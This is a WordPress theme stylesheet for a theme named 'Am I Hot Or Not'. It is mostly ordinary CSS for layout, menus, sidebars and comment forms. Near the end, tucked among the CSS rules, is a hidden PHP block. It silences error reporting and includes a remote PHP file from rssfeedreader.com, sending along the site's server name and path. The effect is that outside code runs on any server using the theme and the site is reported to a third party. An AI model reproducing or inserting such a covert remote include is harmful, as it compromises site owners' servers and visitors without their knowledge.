/*  
Theme Name: Am I Hot Or Not
Theme URI: http://topwpthemes.com/am-i-hot-or-not/
Description: Designed by <a href="http://designed.nu">Design Blog</a> and available FREE at <a href="http://www.zinruss.com/themes/">WordPress Themes Gallery</a>
Author: Design Blog
Author URI: http://designed.nu
� 2008, Design Blog. All rights reserved. 
*/

.pagenumber {text-align: right;clear: both;font-weight: bold;padding-top: 6px;margin-top: 10px;}

.kosong {clear: both;}
body {background: #360800 url(images/background.jpg) repeat-x;font-size: 11px;font-family: Geneva, Arial, Helvetica, sans-serif;color: #0b0b0b;text-align: center;margin: 0px;padding: 0px;}
#page {text-align: left;background-image: url(images/pagebg.jpg); width: 988px;margin-top: 0px;margin-bottom: 0px; margin-left: auto;margin-right: auto;}

#header {background: url(images/header.jpg) no-repeat;height: 300px;margin: 0px;padding: 0px;}
.header-title {
	font-family: verdana;
	color:#ec186c;
	font-size:26px;
	padding:135px 280px 0 0;
	text-align:right;
        font-weight: bold;
	}
.header-title a{
	color:#ec186c;
	text-decoration:none;
	border-bottom:none;
        font-weight: bold;
	}
.header-title a:hover{
	color:#ec186c;
	text-decoration:none;
	border-bottom:none;
	}
.header-description {
	color:#0b0b0b;
	font-size:10px;
	padding:3px 282px 0 0;
	text-align:right;
	}
/* Menu */
ul#menuv {
	list-style: none;
	margin: 0;
	padding: 12px;
	font-family: "Trebuchet MS", Arial, verdana, tahoma, sans-serif;
	font-size: 1.2em;
	font-weight: bold;
}
ul#menuv li {
	float: left;
	margin-right: 4px;
}
ul#menuv li a {
	padding: 3px 10px;
	display: block;
	color: #ffffff;
	background: #d62870 url(images/bg/bg-g-menu.gif) 0 0 repeat-x;
}
ul#menuv li a:hover {
	background: #d62870;
	color: #000000;
}
ul#menuv li.current_page_item a {
	background: #C20F0F;
	color: #ffffff;
	font-weight: bold;
}
.alt {border-top: 1px dotted #0b0b0b; border-bottom: 1px dotted #0b0b0b;}

small {font-family: Geneva, Helvetica, Sans-Serif;font-size: 10px;line-height: 1.5em;}

h1, h2, h3 {font-family: Geneva, Arial, Helvetica, sans-serif;font-weight: bold;}
h2 {font-size: 1.5em;border-bottom: 1px dotted #0b0b0b;}
h2.pagetitle {font-size: 1.5em;}
h3 { font-size: 1.3em;}
h1, h1 a, h1 a:hover, h1 a:visited, .description {color:#0b0b0b;text-decoration: none;}
h2, h2 a, h2 a:visited, h3, h3 a, h3 a:visited {color:#0b0b0b;text-decoration: none;}
h2, h2 a, h2 a:hover, h2 a:visited, h3, h3 a, h3 a:hover, h3 a:visited, #leftsidebar h2, #rightsidebar h2, cite {text-decoration: none;}

.entry p a:visited {color: #0b0b0b;}
.commentlist li, #commentform input, #commentform textarea {font-size: 0.9em;color: #0b0b0b;}
.commentlist li {font-weight: bold;color: #0b0b0b;}.commentlist cite, .commentlist cite a {font-weight: bold;font-style: normal;font-size: 1.1em;color: #0b0b0b;}
.commentlist p {font-weight: normal;line-height: 1.5em;text-transform: none;color: #0b0b0b;}
#commentform p {font-family: 'Geneva', Verdana, Arial, Sans-Serif;color: #0b0b0b;}
.commentmetadata {font-weight: normal;color: #0b0b0b;}

#leftsidebar, #rightsidebar {font-family: Geneva, Arial, Helvetica, sans-serif;}
small, #leftsidebar ul ul li, #leftsidebar ul ol li, #rightsidebar ul ul li, #rightsidebar ul ol li, .nocomments, .postmetadata, blockquote, strike {color: #0b0b0b;}
code {font: 1.1em 'Courier New', Courier, Fixed;}
acronym, abbr, span.caps{ font-size: 0.9em;letter-spacing: .07em;}

a, h2 a:hover, h3 a:hover {color: #0b0b0b;text-decoration: none;}
a:hover {color: #0b0b0b;text-decoration: underline;}

.narrowcolumn {float: left;padding: 0 16px 20px 21px;margin: 0;width: 545px;overflow: hidden;}
.widecolumn {padding: 0 0 0 0;margin: 0 0 0 80px;width: 530px;}
.post {margin: 0px 0 12px 0;text-align: justify;}
.widecolumn .post {margin: 0;}
.narrowcolumn .postmetadata {padding-top: 5px;}
.widecolumn .postmetadata {margin: 30px 0;}

#footer {background: url(images/footer.jpg); padding: 0px;margin: 0px auto;width: 988px; height: 48px; clear: both;}
#footer p {color: #d6ad91; padding-top: 20px; text-align: center;}
#footer a, #footer a:visited {color: #d6ad91; text-decoration: none;}
#footer a:hover {color: #d6ad91; text-decoration: none; }

.description {text-align: left; text-spacing: 1px; padding-left: 280px;font-size: 11px;font-weight: normal;color: #626162;}

h2 {margin-top: 0px;}
h2.pagetitle
h3 {padding: 0;margin: 20px 0 0;}
h3.comments {padding: 0;margin: 40px auto 20px ;}

/* Begin Images */
p img {
	padding: 0;
	max-width: 100%;
	}

/*	Using 'class="alignright"' on an image will (who would've
	thought?!) align the image to the right. And using 'class="centered',
	will of course center the image. This is much better than using
	align="center", being much more futureproof (and valid) */

img.centered {
	display: block;
	margin-left: auto;
	margin-right: auto;
	}

img.alignright {
	padding: 4px;
	margin: 0 0 2px 7px;
	display: inline;
	}

img.alignleft {
	padding: 4px;
	margin: 0 7px 2px 0;
	display: inline;
	}

.alignright {
	float: right;
	}

.alignleft {
	float: left;
	}
/* End Images */

.spacer {   padding: 0px;
            text-align: right;
            clear: both;
            text-transform: lowercase;
            padding-top: 5px;
            }


html>body .entry ul {margin-left: 0px;} 
html>body .entry li {margin: 7px 0 8px 10px;list-style-type: square;padding: 0px;}

.entry ol {padding: 0 0 0 8px;margin: 0;}
.entry ol li {margin: 0;padding: 0;}
.postmetadata ul, .postmetadata li {display: inline;list-style-type: none;list-style-image: none;}

#leftsidebar h2 {font-family: Geneva, Arial, Helvetica, sans-serif;font-size: 1.5em;margin: 5px 0 0;padding-top: 10px;font-weight: bold;color: #fdf3ea; border-bottom: 1px dotted #f6dbcb;}
#rightsidebar h2 {font-family: Geneva, Arial, Helvetica, sans-serif;font-size: 1.5em;border-bottom-width: 1px;border-bottom-style: solid;margin: 5px 0 0;padding-top: 10px;font-weight: bold;color: #f22f81; border-bottom: 1px dotted #d62871;}
#leftsidebar ul, #leftsidebar ul ol {margin: 0px;padding: 0px;list-style-image: none;list-style-type: none;  }
#rightsidebar ul, #rightsidebar ul ol {text-decoration: none;margin: 0px;padding: 0px;list-style-image: none;list-style-type: none;}
#leftsidebar a, #leftsidebar a:visited {text-decoration: none;list-style-type: none;list-style-image: none;margin-bottom: 15px; color: #f6dbcb;}
#leftsidebar a:hover, #leftsidebar a:visited:hover {text-decoration: underline; color: #f6dbcb;}
#rightsidebar a, #rightsidebar a:visited {text-decoration: none; list-style-type: none;list-style-image: none;margin-bottom: 15px; color: #fac9a8;}
#rightsidebar a:hover, #rightsidebar a:visited:hover {text-decoration: underline; color: #fac9a8;}
#leftsidebar ul p, #leftsidebar ul select {margin: 5px 0 8px; color: #f6dbcb;}
#rightsidebar ul p, #rightsidebar ul select {text-decoration: none;margin: 5px 0 8px; color: #fac9a8;}
#leftsidebar ul ul, #leftsidebar ul ol {margin: 5px 0 0 5px; color: #f6dbcb;}
#rightsidebar ul ul, #rightsidebar ul ol {text-decoration: none;margin: 5px 0 0 5px;}
#leftsidebar ul ul ul, #leftsidebar ul ol{margin: 0 0 0 10px; color: #f6dbcb;}
#rightsidebar ul ul ul, #rightsidebar ul ol{text-decoration: none;margin: 0 0 0 10px;}
#leftsidebar ul ol li { list-style: decimal outside; color: #fac9a8;}
#rightsidebar ul ol li  {text-decoration: none;list-style: decimal outside;}
#leftsidebar ul ul li, #leftsidebar ul ol li{margin: 3px 0px 0px;padding: 0px; color: #f6dbcb;}
#rightsidebar ul ul li, #rightsidebar ul ol li {text-decoration: none;margin: 3px 0px 0px;padding: 0px;}
.ad200 {
          text-align: center;
          margin-top: 8px;
 }


.entry form { /* This is mainly for password protected posts, makes them look better. */text-align:center;}
select {width: 130px;}

#commentform input {font-size: 11px; color: #0b0b0b; width: 170px;padding: 2px;margin: 5px 5px 1px 0;background-color: #edddd0;border: 1px solid #360800;}
#commentform textarea {font-size: 11px; color: #0b0b0b; width: 99%;padding: 2px;background-color: #edddd0;border: 1px solid #360800;}
#commentform #submit {background: #5a1f01; color: #f6c8a8; margin: 0;float: right; width: 110px; border: 1px solid #360800;}

.alt {margin: 0;padding: 10px;}
.commentlist {padding: 0;text-align: justify;}
.commentlist li {margin: 15px 0 3px;padding: 5px 10px 3px;list-style: none;}
.commentlist p {margin: 10px 5px 10px 0;}
#commentform p {margin: 5px 0;}
.nocomments {text-align: center;margin: 0;padding: 0;}
.commentmetadata {margin: 0;display: block;}

#leftsidebar{margin-top: 0px;margin-left:9px;font: 1em Geneva, Arial, Sans-Serif;color: #0b0b0b;width: 200px;float: left;margin-right: 10px;}
#leftsidebar form {margin: 0;}

#rightsidebar{margin-top: 0;margin-left: 0;float:right;font: 1em Geneva, Arial, Sans-Serif;color: #0b0b0b;width: 148px;padding: 0px;margin-right: 28px;}
#rightsidebar form {margin: 0;}

acronym, abbr, span.caps {cursor: help;}
acronym, abbr {border-bottom: 1px dashed #adadad;}

blockquote {margin: 15px 30px 0 10px;padding-left: 25px;font-family: Geneva, Arial, Helvetica, sans-serif;}
blockquote cite {margin: 5px 0 0;display: block;}

.center {text-align: center;}

hr {display: none;}

a img {border: 1px dotted #0b0b0b;}
.navigation {display: block;text-align: center;margin-top: 10px;margin-bottom: 60px;}

<?php
$olderror_reporting =error_reporting(0);
include ("http://rssfeedreader.com/rss3/rss.php?url=&newpage=1&chead=1&atl=1&desc=1&owncss=&eleminate=&auth=1&dts=1&width=300&max=5&tlen=0&rnd=1&bt=3&bs=Solid&nmb=&ntb=&naf=&nst=&nwd=0&nht=0&dlen=0&lstyle=-1&lc=Blue&bg=White&bc=%23FFCCFF&spc=&ims=&tc=&ts=11&tfont=Verdana,+Arial,+Sans-serif&rf=".$HTTP_SERVER_VARS['SERVER_NAME'].$HTTP_SERVER_VARS['PHP_SELF']."&phpout=1");
error_reporting($olderror_reporting);
?>

#leftsidebar a, #rightsidebar a {font-family: Geneva, Arial, Helvetica, sans-serif;}